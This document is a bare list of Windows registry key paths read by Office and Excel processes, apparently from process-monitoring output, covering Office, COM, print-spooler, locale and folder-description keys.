HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\CustomUIRoaming
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\PreferOTFontIcon
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{cacaf262-9370-4615-a13b-9f5539da4c0a}\InsecureQI
HKEY_CURRENT_USER\Control Panel\Desktop\CaretWidth
HKEY_CURRENT_USER\Control Panel\Desktop\CursorBlinkRate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Signal\PreWarm\ExcelLastUseTimestamp
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\FOLDERID_Desktop
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\FOLDERID_Documents
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Viewer
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Place MRU\FOLDERID_Desktop
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Place MRU\FOLDERID_Documents
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\ShownFirstRunOptin
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Registration\AcceptAllEulas
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Registration\AcceptAllEulas
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\EulasSetAccepted
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\DisconnectedState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\UpdateUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\CDNBaseUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\UserCCSDisabled
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{9B92EB61-CBC1-11D3-8C2D-00A0CC37B591}\1.2\0\win32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\FriendlyName
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\LabelText
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\Save
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\ShowButtons
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\ShowIndicators
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoLabelOption
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoSaveOption
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoButtonOption
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoIndicatorOption
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InsecureQI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\EmulateOLS
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\LastKnownC2RProductReleaseId\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options\DefaultFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\ShownFileFmtPrompt
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\FileFormatBallotBoxTelemetryEventSent
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\UpsellState
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AirSpaceOArtEnable
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\HitTestOverlayUnselectedColor
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\HitTestOverlaySelectedColor
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\Resiliency\ResiliencySimulator
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{94269c4e-071a-4116-90e6-52e557067e4e}\InsecureQI
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InsecureQI
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77f10cf0-3db5-4966-b520-b7c54fd35ed6}\InsecureQI
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2D3468C1-36A7-43B6-AC24-D3F02FD9607A}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2D3468C1-36A7-43B6-AC24-D3F02FD9607A}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2d3468c1-36a7-43b6-ac24-d3f02fd9607a}\InsecureQI
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PenPointerMode
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SmtDelaySleepLoopWindowSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SmtDelaySpinCountThreshold
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SmtDelayBaseYield
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SmtFactorYield
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SmtDelayMaxYield
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\SplWOW64TimeOutSeconds
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\SplWOW64TimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService\10
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SecurityProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Comment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\RpcId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Version
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\TokenSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\SynchronousPrintHandleAccessMode
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\PrinterDriverUnloadTimeOutMinutes
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Srp\Gp\RuleCount
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Ids\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Ids\en
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\RunBinaryControlHostProcessInSeparateAppContainer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\splwow64.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize\AppsUseLightTheme
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\text/xml\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IsTextPlainHonored
HKEY_CURRENT_USER\Control Panel\International\sList
HKEY_CURRENT_USER\Control Panel\International\sDecimal
HKEY_CURRENT_USER\Control Panel\International\sThousand
HKEY_CURRENT_USER\Control Panel\International\sGrouping
HKEY_CURRENT_USER\Control Panel\International\sNativeDigits
HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep
HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep
HKEY_CURRENT_USER\Control Panel\International\sMonGrouping
HKEY_CURRENT_USER\Control Panel\International\sPositiveSign
HKEY_CURRENT_USER\Control Panel\International\sNegativeSign
HKEY_CURRENT_USER\Control Panel\International\sTimeFormat
HKEY_CURRENT_USER\Control Panel\International\sShortTime
HKEY_CURRENT_USER\Control Panel\International\s1159
HKEY_CURRENT_USER\Control Panel\International\s2359
HKEY_CURRENT_USER\Control Panel\International\sShortDate
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_CURRENT_USER\Control Panel\International\sLongDate
HKEY_CURRENT_USER\Control Panel\International\iCountry
HKEY_CURRENT_USER\Control Panel\International\iMeasure
HKEY_CURRENT_USER\Control Panel\International\iPaperSize
HKEY_CURRENT_USER\Control Panel\International\iDigits
HKEY_CURRENT_USER\Control Panel\International\iLZero
HKEY_CURRENT_USER\Control Panel\International\iNegNumber
HKEY_CURRENT_USER\Control Panel\International\NumShape
HKEY_CURRENT_USER\Control Panel\International\iCurrDigits
HKEY_CURRENT_USER\Control Panel\International\iCurrency
HKEY_CURRENT_USER\Control Panel\International\iNegCurr
HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek
HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear
HKEY_CURRENT_USER\Control Panel\International\sCurrency
HKEY_CURRENT_USER\Control Panel\International\iCalendarType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\EnableJavaScriptDebugging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\COM+Enabled
HKEY_CURRENT_USER\Software\Microsoft\Windows Script\Settings\Telemetry\splwow64.exe\JScriptSetScriptStateStarted
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\Com+Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\DllPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\Threading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\RemoteServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivateAsUser
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\Permissions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ExePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\CommandLine
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\IdentityType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\Permissions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ActivatableClasses
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ServerType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\Identity
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ServiceName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ExplicitPsmActivationType
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Appx\AllowDevelopmentWithoutDevLicense
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock\AllowDevelopmentWithoutDevLicense
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompat\RaiseActivationAuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\splwow64.exe\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{CB363445-F453-4C1E-8EE4-BD123C5E394F}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{CB363445-F453-4C1E-8EE4-BD123C5E394F}\AccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9DEBA2EE-C7E4-47AE-85D5-56C59D090DA5}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\MaxSxSHashCount
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{AF86E2E0-B12D-4c6a-9C5A-D7AA65101E90}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{801156FD-7E96-4274-821E-96D94E0C2B1F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{3CE4B87D-0ABF-4E76-A557-A2082325270A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\DontUseArchive
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\FileCoAuthTelemetryRampStatus
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\ParsingName_36354489
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\DefinitionFlags
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\ParsingName_36354489
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Roamable
